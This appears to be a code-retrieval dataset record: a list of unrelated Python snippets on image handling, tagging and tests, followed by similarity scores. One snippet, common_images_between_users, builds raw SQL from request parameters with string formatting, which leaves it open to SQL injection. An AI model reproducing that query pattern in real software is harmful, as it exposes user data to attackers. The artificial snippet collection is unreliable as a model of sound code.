headers' % (newimagesize,))\n if newimagesize < 500000:\n # Smaller than 500KB is just too small to bother check to replace\n return\n\n for imageclaim in claims.get(u'P18'):\n currentsize = imageclaim.getTarget().latest_file_info.size\n #print (u'Size of the current image is %s' % (currentsize,))\n # New image should at least be 4 times larger\n if currentsize * 4 > newimagesize:\n return\n\n newclaim = pywikibot.Claim(self.repo, u'P4765')\n newclaim.setTarget(metadata[u'imageurl'])\n pywikibot.output('Adding commons compatible image available at URL claim to %s' % item)\n item.addClaim(newclaim)\n\n if metadata.get(u'imageurlformat'):\n newqualifier = pywikibot.Claim(self.repo, u'P2701')\n newqualifier.setTarget(pywikibot.ItemPage(self.repo, metadata.get(u'imageurlformat')))\n pywikibot.output('Adding new qualifier claim to %s' % item)\n newclaim.addQualifier(newqualifier)\n\n newqualifier = pywikibot.Claim(self.repo, u'P2699')\n newqualifier.setTarget(metadata[u'describedbyurl'])\n pywikibot.output('Adding new qualifier claim to %s' % item)\n newclaim.addQualifier(newqualifier)\n\n if metadata.get('title'):\n if metadata.get('title').get(u'en'):\n title = pywikibot.WbMonolingualText(metadata.get('title').get(u'en'), u'en')\n else:\n lang = list(metadata.get('title').keys())[0]\n title = pywikibot.WbMonolingualText(metadata.get('title').get(lang), lang)\n newqualifier = pywikibot.Claim(self.repo, u'P1476')\n newqualifier.setTarget(title)\n pywikibot.output('Adding new qualifier claim to %s' % item)\n newclaim.addQualifier(newqualifier)\n\n if metadata.get('creatorname'):\n newqualifier = 
pywikibot.Claim(self.repo, u'P2093')\n newqualifier.setTarget(metadata.get('creatorname'))\n pywikibot.output('Adding new qualifier claim to %s' % item)\n newclaim.addQualifier(newqualifier)\n\n if metadata.get(u'imageurllicense'):\n newqualifier = pywikibot.Claim(self.repo, u'P275')\n newqualifier.setTarget(pywikibot.ItemPage(self.repo, metadata.get(u'imageurllicense')))\n pywikibot.output('Adding new qualifier claim to %s' % item)\n newclaim.addQualifier(newqualifier)", "def test_get_imagelist_inmutable(self):\n images1 = self.mock_master.get_imagelist(self.region1)\n images2 = self.mock_master.get_imagelist(self.region1)\n r2dict = dict((i.id, i) for i in images2)\n self.assertEquals(images1, images2)\n self.assertNotEquals(id(images1), id(images2))\n for image in images1:\n self.assertIn(image.id, r2dict)\n image2 = r2dict[image.id]\n self.assertEquals(image, image2)\n self.assertNotEquals(id(image), id(image2))\n self.assertNotEquals(id(image.user_properties),\n id(image2.user_properties))", "def test_photo_classification_view_set_post_successful(self):\n # Test data\n user = account_models.User.objects.get(email='[email protected]')\n\n # Simulate auth\n token = test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n payload = {\n 'name': 'Night',\n 'classification_type': 'tag'\n }\n\n request = client.post('/api/photo_classifications', data=payload, format='json')\n result = request.data\n\n self.assertEquals(result['name'], 'Night')\n\n # Query for entry as well\n classifications = photo_models.PhotoClassification.objects.all()\n\n # 11 classifications are loaded by fixture\n self.assertEquals(len(classifications), 12)", "def test_update_multiple(self):\n tag_id = \"update_photo_tag\"\n # Get a couple of photos\n photos = self.photos[:2]\n\n # Add the tag using a list of photo objects\n self.client.photos.update(photos, tagsAdd=tag_id)\n\n # Check that it's there\n for photo in self.client.photos.list()[:2]:\n self.assertIn(tag_id, photo.tags)\n\n # Remove the tags using a list of photo ids\n self.client.photos.update([photo.id for photo in photos],\n tagsRemove=tag_id)", "def tag_images(self, image_files, model=None):\n return self._multi_image_op(image_files, ['tag'], model=model)", "def test_get_photos_paging(self):\n pass", "def test_recipe_taste_by_id_image(self):\n pass", "def test_type_image(image):\n resource = models.MediaResource(image=image)\n\n assert resource.type == models.MediaResource.TYPE_IMAGE", "def __init__(self, user_id: str = None, image: str = None): # noqa: E501\n self.swagger_types = {\"user_id\": str, \"image\": str}\n\n self.attribute_map = {\"user_id\": \"userId\", \"image\": \"image\"}\n self._user_id = user_id\n self._image = image", "def test_add_same_image_two_system(self):\n record = self.good_record()\n record['tag'] = self.tag\n # Create a fake record in mongo\n id1 = self.images.insert(record.copy())\n # add testtag for systema\n status = self.m.add_tag(id1, self.system, 'testtag')\n self.assertTrue(status)\n record['system'] = 'systemb'\n id2 = self.images.insert(record.copy())\n status = self.m.add_tag(id2, 'systemb', 'testtag')\n self.assertTrue(status)\n # Now make sure testtag for first system is still\n # present\n rec = self.images.find_one({'_id': id1})\n self.assertIsNotNone(rec)\n self.assertIn('testtag', rec['tag'])", "def setUp(self):\n\n self.user_1 = User.objects.create_user(\n username='testuser', password='12345',\n email='[email 
protected]'\n )\n\n # self.profile_1 = Profile.objects.create(user=self.user_1,\n # image='profile_default.jpg')", "def common_images_between_users(request):\n collected_values = {}\n\n if request.method != 'GET':\n collected_values[\"success\"] = False\n collected_values[\"errmsg\"] = \"Wrong HTTP verb\"\n return JsonResponse(collected_values, status=400)\n\n collected_values[\"user_id\"] = request.GET[\"user_id\"]\n uid = collected_values[\"user_id\"]\n collected_values[\"token\"] = request.GET[\"token\"]\n token = collected_values[\"token\"]\n collected_values[\"oid\"] = request.GET[\"oid\"]\n oid = collected_values[\"oid\"]\n\n # Check auth\n is_valid, collected_values[\"token\"] = check_auth(uid, token, timezone.now())\n if not is_valid:\n collected_values[\"success\"] = False\n collected_values[\"errmsg\"] = \"Invalid Token\"\n return JsonResponse(collected_values, status=400)\n\n # Get all matching users and the image id from linx_reactions\n user_raw_query = \"SELECT DISTINCT a.rid, a.iid FROM linx_reactions as a INNER JOIN linx_reactions as b ON a.iid = b.iid AND a.user_id == \\'{}\\' AND b.user_id = \\'{}\\' ORDER BY a.iid;\".format(uid, oid)\n\n image_ids_to_list = Reactions.objects.raw(user_raw_query)\n\n image_ids = \"\"\n\n # Load rows to string\n for image_obj in image_ids_to_list:\n image_ids = image_ids + \"\\'\" + str(image_obj.iid) + \"\\',\"\n\n # Remove last comma\n image_ids = image_ids[:-1]\n\n image_links_query = \"SELECT iid,link FROM linx_images WHERE iid IN ({});\".format(image_ids)\n image_links_to_show = Images.objects.raw(image_links_query)\n list_image_ids = []\n for image_obj in image_links_to_show:\n list_image_ids.append(image_obj.link)\n\n collected_values[\"images_urls\"] = list_image_ids\n collected_values[\"success\"] = True\n\n LOGGER.info(\"Common images between users result: %s\", collected_values)\n return JsonResponse(collected_values, status=200)", "def test_single_image_with_special_tag(self, client, tag):\n train_id = gbl.get_train_ids()[0]\n params = dict(train_id=train_id, tag=tag, step=1)\n url = get_url(BASE_URL, params)\n\n response = client.get(url)\n assert response.status_code == 400\n\n response = response.get_json()\n assert response['error_code'] == '5054500D'\n assert response['error_msg'] == \"Image is not exist. Detail: Invalid parameter value. 
\" \\\n \"Can not find any data in this train job by given tag.\"", "def test_emotion_is_created_and_attached_to_user(self):\n one_user = User.objects.last()\n\n emotion = EmotionFactory(user=one_user, anger=.1)\n emotion.save()\n\n self.assertEqual(one_user.emotions.first().anger, .1)", "def setUp(self):\n fun = Category(name=\"funny\")\n fun.save()\n lagos = Location(name=\"Lagos\")\n lagos.save()\n self.new_image = Pics(\n name=\"image\", description=\"h\", location=lagos, category=fun)", "def test_activity_photos(self):\n activity = self.client.get_activity(152668627)\n self.assertTrue(activity.photo_count > 0)\n photos = list(activity.photos)\n self.assertEqual(len(photos), 1)\n self.assertEqual(len(photos), activity.photo_count)\n self.assertIsInstance(photos[0], model.ActivityPhoto)", "def create_fake_data():\n s = Story.objects.create(body=\"farfrompuken is so awesome, i just love it.\",\n author_name=\"jared nuzzolillo\")\n\n img_urls = (\"https://dl.dropboxusercontent.com/u/190173/typequoting/images/u-B.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/u-D.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/l-f.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/u-K.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/l-m.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/u-P.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/u-T.png\",)\n\n for i, img_url in enumerate(img_urls):\n StoryImage.objects.create(\n story=s,\n image=Image.objects.create(\n url=img_url,\n name=\"name %d\" % i,\n author_name=\"Johnny %d Times\" % i,\n author_url=\"http://somewherecool%d\" % i,\n uppercase=\"uppercase %d\" % i,\n typeface=\"typeface %d\" % i))", "def test_delete_image_by_wrong_tag(self, test_image):\n tag = f\"{TEST_IMAGE_NAME}:wrong_tag\"\n assert image_exists(TEST_IMAGE_NAME)\n assert not delete_image(tag, force=True)\n assert image_exists(TEST_IMAGE_NAME)\n\n # now delete using that tag, both tags will be gone because it's the same image.\n build_test_image(tag=tag)\n assert image_exists(TEST_IMAGE_NAME)\n assert image_exists(tag)\n assert delete_image(tag, force=True)\n assert not image_exists(TEST_IMAGE_NAME)\n assert not image_exists(tag)", "def copy_images(apps, schema_editor):\n\n FieldImage = apps.get_model('field_wagtail', 'FieldImage')\n Image = apps.get_model('wagtailimages', 'Image')\n django_content_type = apps.get_model('contenttypes', 'contenttype')\n tagged_item_model = apps.get_model('taggit', 'TaggedItem')\n\n images = Image.objects.all()\n new_images = []\n for image in images:\n new_images.append(FieldImage(\n id=image.id,\n title=image.title,\n file=image.file,\n width=image.width,\n height=image.height,\n created_at=image.created_at,\n focal_point_x=image.focal_point_x,\n focal_point_y=image.focal_point_y,\n focal_point_width=image.focal_point_width,\n focal_point_height=image.focal_point_height,\n file_size=image.file_size,\n collection=image.collection,\n uploaded_by_user=image.uploaded_by_user,\n alt_text=''\n ))\n\n FieldImage.objects.bulk_create(new_images)\n\n ct_extended_model, created = django_content_type.objects.get_or_create(\n app_label='field_wagtail',\n model='fieldimage'\n )\n ct_wagtail_model = django_content_type.objects.get(\n app_label='wagtailimages',\n model='image'\n )\n\n tagged_item_model.objects.filter(\n content_type_id=ct_wagtail_model.id).update(\n content_type_id=ct_extended_model.id\n )", "def 
test_aws_service_api_image_get(self):\n pass", "def test_image_obj_creado_con_exito(self):\n self.assertTrue(self.image_model.objects.get(pk=self.image_obj.pk))", "def test_deletion_of_user_photo_succeeds(self):\n\t\tself.name = 'media.png'\n\t\tself.image = File(open('static/img/media.png', 'rb'))\n\t\tself.created_image = UserPhoto(image=self.image, name=self.name, created_by=self.user)\n\t\tself.created_image.save()\t\t\t\n\t\tresponse = self.client.delete('/api/modify_photo/?id={}'.format(self.created_image.id))\n\t\tself.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)", "def test_retrieve_tags_assigned_unique(self):\n tag1 = Tag.objects.create(user = self.user,name='Breakfast')\n tag2 = Tag.objects.create(user=self.user,name='Lunch')\n\n recipe1 = Recipe.objects.create(user=self.user,title='Goose Liver on toast',price=5.00,time_minutes=15)\n recipe2 = Recipe.objects.create(user = self.user,title='Egg Benedict',price=5.00,time_minutes=15)\n recipe1.tags.add(tag1)\n recipe2.tags.add(tag1)\n\n res = self.client.get(TAGS_URL,{'assigned_only':1})\n self.assertEqual(len(res.data),1)", "def aug_test(self, imgs, img_metas, **kwargs):\n pass", "def aug_test(self, imgs, img_metas, **kwargs):\n pass", "def testimage_handler(self):\n\t\t\n\t\tthings = Thing.objects.all()\n\t\tif len( things ):\n\t\t\tthing = things[0]\n\t\telse:\n\t\t\tc = Client()\n\t\t\tdata = parse_qs( 'title=&tags=&lattitude=32.82248&longitude=-96.762986&duration=&parent=&privacy=U&lifespan=&format=txt' )\n\t\t\tdata[ 'media' ] = open( MEDIA_ROOT + 'unittest_image.jpg' )\n\t\t\tc.post( '/api/place/', data )\n\t\t\t\n\t\t\tthing = Thing.objects.all()[0]\n\n\t\t\n\t\turi = thing.media.replace( 'http://' + DOMAIN, '' )\n\t\t\n\t\tc = Client()\n\t\tresponse = c.get( uri )\n\t\tself.failUnlessEqual(response.status_code, 200)", "def test_record_emotions_post_adds_emotion_to_db(self):\n from emotion_emotions.views import RecordEmotions\n num = len(Emotion.objects.all())\n request = self.request.post('', data={'image': 'data:base64,FAKE'})\n request.user = self.dan\n view = RecordEmotions(request=request)\n view.post(request)\n new_num = len(Emotion.objects.all())\n self.assertEqual(num + 1, new_num)", "def fetch_photo_id_image(self):\r\n if settings.FEATURES.get('AUTOMATIC_VERIFY_STUDENT_IDENTITY_FOR_TESTING'):\r\n return\r\n\r\n self.photo_id_key = self.original_verification(self.user).photo_id_key\r\n self.save()", "def forward_test(self, img, img_metas, **kwargs):", "def simple_test(self, img, img_meta, **kwargs):\n pass", "def test_answer_meta_image_uses_category_image_if_no_social_image(self):\n category = baker.make(Category, category_image=self.test_image)\n page = self.page1\n page.category.add(category)\n page.save_revision()\n self.assertEqual(page.meta_image, self.test_image)", "def test_get_image_id(self):\n img_id = str(uuid.uuid4())\n img_name = 'myfakeimage'\n self.my_image.id = img_id\n self.my_image.name = img_name\n self.sahara_client.images.get.return_value = self.my_image\n self.sahara_client.images.find.side_effect = [[self.my_image], []]\n\n self.assertEqual(img_id, self.sahara_plugin.get_image_id(img_id))\n self.assertEqual(img_id, self.sahara_plugin.get_image_id(img_name))\n self.assertRaises(exception.EntityNotFound,\n self.sahara_plugin.get_image_id, 'noimage')\n\n calls = [mock.call(name=img_name),\n mock.call(name='noimage')]\n self.sahara_client.images.get.assert_called_once_with(img_id)\n self.sahara_client.images.find.assert_has_calls(calls)", "def 
test_price_breakdown_by_id_image(self):\n pass", "def test_Image():\n assert Image(cur, \"Simple_Linear\").detect_image() == True\n assert Image(cur, \"Logistic_Linear\").detect_image() == False\n assert Image(cur, \"Simple_Linear\").date == \"2021-04-20\"\n assert Image(cur, \"Breslow-Day_Test\").source == \"Course BIOSTAT703 slide\"", "def test_create_recipe_with_tags(self):\n tag1 = sample_tag(user=self.user,name='vegan')\n tag2 = sample_tag(user=self.user, name='dessert')\n payload = {\n 'title':'cheesecake',\n 'tag':[tag1.id,tag2.id],\n 'time_minutes':60,\n 'price':10.00,\n }\n res = self.client.post(RECIPE_URL,payload)\n self.assertEqual(res.status_code,status.HTTP_201_CREATED)\n recipe = Recipe.objects.get(id=res.data['id'])\n tags = recipe.tag.all()\n self.assertEqual(len(tags),2)\n self.assertIn(tag1,tags)\n self.assertIn(tag2,tags)", "def get_images_by_vulnerability(self, **kwargs):\n ..." ]
[ "0.66079843", "0.6477032", "0.6326245", "0.6268388", "0.6267517", "0.6212116", "0.6183669", "0.61595887", "0.6151405", "0.61384684", "0.60875714", "0.60794526", "0.6066342", "0.60580915", "0.6017938", "0.60149026", "0.600587", "0.6003988", "0.5976658", "0.59595704", "0.5959389", "0.5944568", "0.5924291", "0.59211135", "0.589627", "0.5887148", "0.5880393", "0.58649886", "0.5861153", "0.5850407", "0.5849973", "0.58262974", "0.58257467", "0.58053976", "0.5800949", "0.5773536", "0.5770676", "0.57614267", "0.57304215", "0.57161194", "0.5712388", "0.57110626", "0.56890166", "0.56807595", "0.5666246", "0.5664621", "0.5661664", "0.5655272", "0.5654474", "0.5653362", "0.5652592", "0.5636366", "0.5632572", "0.5630062", "0.56242555", "0.5621509", "0.56148183", "0.5608346", "0.5607644", "0.5586847", "0.55742043", "0.5573187", "0.5560907", "0.554996", "0.55474967", "0.55376804", "0.5520847", "0.55140877", "0.5509492", "0.55073214", "0.5492122", "0.5487059", "0.54864615", "0.54864377", "0.5484148", "0.5479218", "0.54647034", "0.5459926", "0.5452578", "0.5435263", "0.54266876", "0.54238445", "0.5417995", "0.5416855", "0.54159874", "0.5414571", "0.54141396", "0.5411324", "0.5411324", "0.54096735", "0.54073346", "0.5403596", "0.53911453", "0.5390099", "0.5376477", "0.5375408", "0.5370571", "0.5363878", "0.5361499", "0.536111" ]
0.56813097
43
Method to be implemented
def update_with_fit_args(self, **kwargs): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __call__(self):\n raise NotImplementedError", "def support(self):", "def __call__(self):\n raise NotImplementedError()", "def __call__(self):\r\n raise NotImplementedError('override me')", "def __call__(self):\n\t\treturn", "def __call__(self) -> None:", "def __call__( self ):\n pass", "def __call__(self):\n pass", "def __call__(self):\n pass", "def implement(self):\n\t#@DEBUG remove comments", "def use(self):", "def function(self):\n raise NotImplementedError", "def regular(self):", "def override(self):\n return None", "def degibber(self):", "def test(self):\n raise NotImplementedError", "def intuit(self):\n raise NotImplemented()", "def __call__(self, *args, **kwargs):\r\n raise NotImplementedError", "def __call__(self, *args, **kwargs):\r\n raise NotImplementedError", "def __call__(self, *args, **kwargs):\r\n raise NotImplementedError", "def __init__(self):\n raise NotImplementedError", "def __init__(self):\n raise NotImplementedError", "def __init__(self):\n raise NotImplementedError", "def __init__(self):\n raise NotImplementedError", "def __call__(self, *args, **kwargs):\n raise NotImplementedError", "def __call__(self, *args, **kwargs):\n raise NotImplementedError", "def think(self):\n pass", "def __call__(self, **kwargs):\n raise NotImplementedError", "def basic(self):\n pass", "def logic(self):\r\n raise NotImplementedError", "def moi(self):\n\n pass", "def _proceed(self):\n raise NotImplementedError", "def method(self):", "def handle(self):", "def apply(self) -> None:", "def apply(self) -> None:", "def __int__(self):\n pass", "def process(self):", "def process(self):", "def process(self):", "def __init__(self):\n raise NotImplementedError()", "def d(self):\n pass", "def d(self):\n pass", "def _hook(self):", "def CL(self):", "def _create_impl(self):", "def apply(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def initialize(self):", "def initialize(self):", "def initialize(self):", "def initialize(self):", "def init(self):", "def init(self):", "def processing(self):\n pass", "def offering(self):\r\n raise NotImplementedError()", "def _prepare(self):", "def _prepare(self):", "def present(self):", "def __call__(self) -> dict:\n\t\tpass", "def call(self):", "def _build_impl(self):", "def _init(self):\n raise NotImplementedError", "def run(self):\n raise NotImplementedError # implement in subclass", "def target(self):", "def bad(self):\n raise NotImplementedError", "def bad(self):\n raise NotImplementedError", "def check(self):\n raise NotImplementedError", "def _run(self):\n raise NotImplementedError", "def _run(self):\n raise NotImplementedError", "def __init__(self):\r\n\t\tpass", "def base(self):\n raise NotImplementedError()", "def initialise(self):", "def __call__():", "def __call__():", "def __call__():", "def __call__():", "def __call__():", "def extension (self):\n assert False, \"To be implemented by child\"", "def perform(self):\n pass", "def _init(self):", "def mezclar_bolsa(self):", "def __init__(self):\n raise NotImplementedError(\"This class cannot be instantiated!\")", "def result(self):", "def result(self):", "def run(self): \r\n return", "def __init__():", "def perform(self):\n raise NotImplementedError", "def __init__ (self) :", "def __call__(self):", "def __call__(self):", "def apply(self): # pragma: no cover\n raise NotImplementedError" ]
[ "0.78358424", "0.7723889", "0.7493241", "0.7416625", "0.7341111", "0.7135667", "0.7118768", "0.71088976", "0.71088976", "0.70884323", "0.69750255", "0.68996793", "0.6808303", "0.6796849", "0.6753698", "0.67092526", "0.66899514", "0.6654799", "0.6654799", "0.6654799", "0.6641924", "0.6641924", "0.6641924", "0.6641924", "0.6596571", "0.6596571", "0.6588812", "0.6571001", "0.6568187", "0.65485066", "0.6520751", "0.65138245", "0.6494921", "0.64902943", "0.6467395", "0.6467395", "0.6465909", "0.6441366", "0.6441366", "0.6441366", "0.6424249", "0.6420371", "0.6420371", "0.64175504", "0.6413171", "0.64078313", "0.64028096", "0.6389797", "0.6389797", "0.6389797", "0.6389797", "0.6389797", "0.6389797", "0.6389797", "0.6389797", "0.6389797", "0.6389797", "0.6385707", "0.6385707", "0.6385707", "0.6385707", "0.6385517", "0.6385517", "0.63816535", "0.6370596", "0.63703585", "0.63703585", "0.6363289", "0.6358765", "0.63450044", "0.6337269", "0.63343555", "0.63336754", "0.6328508", "0.6327035", "0.6327035", "0.6318311", "0.6309866", "0.6309866", "0.63090646", "0.6301731", "0.63002306", "0.62871397", "0.62871397", "0.62871397", "0.62871397", "0.62871397", "0.62790257", "0.6277439", "0.627327", "0.6270304", "0.62677425", "0.626764", "0.626764", "0.6250167", "0.6249451", "0.6246711", "0.62440634", "0.6239104", "0.6239104", "0.6233122" ]
0.0
-1
Explore a dataset. dataset: pandas dataset. prj_info: dictionary containing project information (response...)
def explore_data(data,prj_info,TMP=1234):
    print(" Data file rows and columns are : ", data.shape)
    #Open pdf
    pp = PdfPages(prj_info['OUTPUT_PATH'] + "exploration_" + str(TMP) + ".pdf")
    #Plot average
    plot_average_reponse(data,prj_info,pp,TMP)
    #Close pdf
    pp.close()
    return None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def extract_project_details(\n df,\n copy_columns=info_columns,\n column_rename_dict=info_column_rename_dict,\n use_record=0,\n record_index=\"PID_Index\",\n):\n df_details = df.copy().loc[df[record_index] == use_record][copy_columns]\n\n if column_rename_dict:\n df_details = df_details.copy().rename(columns=column_rename_dict)\n\n return df_details.set_index(\"PID\")", "def personnel_projects_table(personnel_search_table_selected_indices, selected_funding, selected_year, rows):\n personnel_outcome_data, personnel_name = personnel_outcomes_helper(personnel_search_table_selected_indices, selected_funding, selected_year, rows)\n if personnel_outcome_data is not None:\n personnel_outcome_data = personnel_outcome_data[[\"type\", \"pub_title\"]]\n return personnel_outcome_data.to_dict('records')\n\n return pd.DataFrame(data=None, columns=[\"type\", \"pub_title\"]).to_dict('records') # None cannot be passed back as it will cause an error.", "def _createDataFromProject(self):\n data = []\n project_dict = self._project.asDict()\n for phase_id, phase_dict in project_dict['phases'].items():\n for fitable_id, fitable_dict in phase_dict['cell'].items():\n data.append({\n 'id': ['phases', phase_id, 'cell', fitable_id],\n 'label': '{} {}'.format(phase_id, fitable_id),\n 'value': fitable_dict['value'],\n 'error': fitable_dict['error'],\n 'refine': fitable_dict['refine']\n })\n return data", "def getProjectData(self) -> ghidra.framework.model.ProjectData:\n ...", "def getIndicePreciosInternosAlPorMayorBase2015(self):\n #Obtener la url de descarga del cvs\n urlPackage=\"https://datos.gob.ar/api/3/action/package_show?id=sspm-indice-precios-internos-basicos-al-por-mayor-dic-2015-100\"\n s=requests.get(urlPackage).content\n objJson = json.loads(s)\n resultado = objJson['result']['resources']\n selector = 0\n ultimoResultado = resultado[selector]\n urlDescarga = ultimoResultado['url']\n descripcion = ultimoResultado['description']\n print(\"Descargando: {}\".format(descripcion))\n print(\"Archivo: {}\".format(urlDescarga))\n \n #Descargar la url con cvs y generar pandas dataframe\n contenidoCVS = requests.get(urlDescarga).content\n flujoCVS = io.StringIO(contenidoCVS.decode('utf-8'))\n df_temp = pd.read_csv(flujoCVS)\n \n #transform string to datetime\n df_temp['indice_tiempo'] = pd.to_datetime(df_temp['indice_tiempo'], format='%Y-%m-%d', errors='ignore')\n df_temp['indice_tiempo'] = df_temp['indice_tiempo'].dt.date\n #set index\n df_temp.set_index('indice_tiempo', inplace=True)\n \n return df_temp", "def get_reanalysis_projects_by_accession(self, accession):\n request_url = self.api_base_url + \"projects/reanalysis/\" + accession\n headers = {\"Accept\": \"application/JSON\"}\n response = Util.get_api_call(request_url, headers)\n return response.json()", "def getCitationsData():\n # Follows https://github.com/simonw/irma-scrapers/issues/1\n citationsResponse = requests.get(\"https://api.github.com/repos/greenelab/covid19-review/git/trees/output\", headers=headers).json()\n treeEntry = [t for t in citationsResponse[\"tree\"] if t[\"path\"] == \"references.json\"][0] \n citations = json.loads(base64.b64decode(requests.get(treeEntry[\"url\"]).json()[\"content\"]))\n\n citationsDF = pd.DataFrame(citations)\n citationsDF[\"Covid19-review_paperLink\"] = citationsDF.id.apply(lambda x: \"https://greenelab.github.io/covid19-review/#ref-\" + x)\n citationsDF = citationsDF[[\"DOI\", \"title\", \"issued\", \"container-title\", \"URL\", \"Covid19-review_paperLink\"]]\n citationsDF.rename(columns={\"DOI\": \"doi\", 
\"issued\": \"date\", \"container-title\": \"publication\"}, inplace=True)\n\n # Convert date to string\n def dateStringFromDateParts(row):\n try:\n dateParts = row['date']['date-parts'][0]\n if len(dateParts) == 3:\n return \"-\".join([str(dateParts[1]), str(dateParts[2]), str(dateParts[0])])\n elif len(dateParts) == 2:\n return \"-\".join([str(dateParts[1]), str(dateParts[0])])\n elif len(dateParts) == 1:\n return str(dateParts[0])\n else:\n return\n except:\n return\n\n citationsDF.date = citationsDF.apply(dateStringFromDateParts, axis=1)\n\n citationsDF.set_index(\"doi\", inplace=True)\n return citationsDF", "def extract_details( session_requests, job_id ):\n \n url_prefix = CONFIG[\"url_prefix\"]\n \n #Extract html from web\n url = CONFIG[\"url_jobno\"] + str(job_id)\n tree = scrape_html(session_requests, url)\n \n #Extact description\n title = \"; \".join(tree.xpath(\"//p[@class='listheader']/text()\"))\n description = \"; \".join(tree.xpath(\"//p//text()\")) #more than one element\n \n #Extract files\n num_file = int(tree.xpath(\"count(//p[contains(text(),'Job Description Document :')]//a)\"))\n loop_range = min(num_file, (MAX_NUM_OF_FILES - 1))\n \n file_link = [\"NA\"] * MAX_NUM_OF_FILES\n file_name = [\"NA\"] * MAX_NUM_OF_FILES\n down_file_name = [\"NA\"] * MAX_NUM_OF_FILES\n \n if (num_file > (MAX_NUM_OF_FILES - 1)):\n file_link[(MAX_NUM_OF_FILES - 1)] = \"More than 9 files\"\n file_name[(MAX_NUM_OF_FILES - 1)] = \"More than 9 files\"\n \n for i in range(loop_range):\n file_link[i] = url_prefix + tree.xpath(\"//p[contains(text(),'Job Description Document :')]//a/@href\")[i]\n file_name[i] = tree.xpath(\"//p[contains(text(),'Job Description Document :')]//a/text()\")[i]\n \n ext = find_file_extention(file_name[i])\n down_file_name[i] = download_file(session_requests, file_link[i], job_id, i, ext)\n \n # dataframe\n row_names_link = init_file_dataframe()[1]\n row_names_name = init_file_dataframe()[2]\n row_names_down = init_file_dataframe()[3]\n \n df_link = np.transpose(pd.DataFrame(file_link, row_names_link))\n df_name = np.transpose(pd.DataFrame(file_name, row_names_name))\n df_down = np.transpose(pd.DataFrame(down_file_name, row_names_down))\n \n df_file = pd.DataFrame(data = {\"job_title\": [title], \"description\": [description], \"num_of_file\": [loop_range]})\n df_file = pd.concat([df_file.reset_index(drop=True), df_link], axis=1, sort=False)\n df_file = pd.concat([df_file.reset_index(drop=True), df_name], axis=1, sort=False)\n df_file = pd.concat([df_file.reset_index(drop=True), df_down], axis=1, sort=False)\n \n return df_file", "def get_data(self, **kwargs):\n\n self.data = {}\n #node_data = ''\n #link_data = ''\n templates_data = self.request_from_server('templates')\n self.templates = templates_data\n project_data = self.request_from_server('projects')\n for project in project_data:\n project_name = project['name']\n if 'project_name' in kwargs:\n if project_name != kwargs['project_name']:\n continue\n\n self.data[project_name] = {}\n self.data[project_name]['project_id'] = project['project_id']\n self.data[project_name]['nodes'] = {}\n node_data = self.request_from_server('projects/{}/nodes'.format(project['project_id']))\n link_data = self.request_from_server('projects/{}/links'.format(project['project_id']))\n for node in node_data:\n node_name = node['name']\n self.data[project_name]['nodes'][node_name] = {}\n self.data[project_name]['nodes'][node_name]['node_id'] = node['node_id']\n self.data[project_name]['nodes'][node_name]['template_id'] = 
node['template_id']\n self.data[project_name]['nodes'][node_name]['node_type'] = node['node_type']\n self.data[project_name]['nodes'][node_name]['console_port'] = node['console']\n self.data[project_name]['nodes'][node_name]['console_session'] = None\n self.data[project_name]['nodes'][node_name]['x'] = node['x']\n self.data[project_name]['nodes'][node_name]['y'] = node['y']\n self.data[project_name]['nodes'][node_name]['ports'] = {}\n if project['status'] != 'closed':\n self.data[project_name]['nodes'][node_name]['status'] = node['status']\n for port in node['ports']:\n port_name = port['short_name']\n self.data[project_name]['nodes'][node_name]['ports'][port_name] = {}\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['adapter_number'] = port['adapter_number']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['port_number'] = port['port_number']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['link_type'] = port['link_type']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['link_id'] = None\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['in_use'] = False\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['connected_to'] = None\n for link in link_data:\n for link_node in link['nodes']:\n if node['node_id'] == link_node['node_id']:\n if link_node['label']['text'] == port_name:\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['link_id'] = link['link_id']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['in_use'] = True\n if link['nodes'].index(link_node) == 0:\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['connected_to_id'] = link['nodes'][1]['node_id']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['connected_to'] = self.get_node_name_from_id(project_name,link['nodes'][1]['node_id'])\n else:\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['connected_to_id'] = link['nodes'][0]['node_id']\n self.data[project_name]['nodes'][node_name]['ports'][port_name]['connected_to'] = self.get_node_name_from_id(project_name,link['nodes'][0]['node_id'])", "def _parse_project_params(self, response_tree, data):\n # if self.project == 'TWC':\n # data['lithium'] = response_tree.find('lithiumresults').text\n\n if self.project == 'ILAR':\n data['ilar_title'] = response_tree.find('ilartitle').text\n data['ilar_rank'] = int(response_tree.find('ilarrank').text)\n\n if response_tree.find('ilarresponse').text is None:\n data['ilar_response'] = None\n else:\n data['ilar_response'] = response_tree.find(\n 'ilarresponse').text.encode('ascii', 'ignore')", "def fetch_data(self) -> pd.DataFrame:\r\n os.chdir(r'\\\\192.168.8.90\\投研部\\Jessica\\test_data')\r\n if self.tic in ['RB.CCRI', 'HC.CCRI', 'I.CCRI', 'J.CCRI', 'JM.CCRI', 'ZC.CCRI']:\r\n f = pd.read_hdf('data.h5', 'snc')\r\n if self.tic in ['CU.CCRI', 'ZN.CCRI', 'AL.CCRI', 'NI.CCRI']:\r\n f = pd.read_hdf('data.h5', 'met')\r\n data = f.loc[f.loc[:, 'sec_code'] == self.tic, :]\r\n # extract 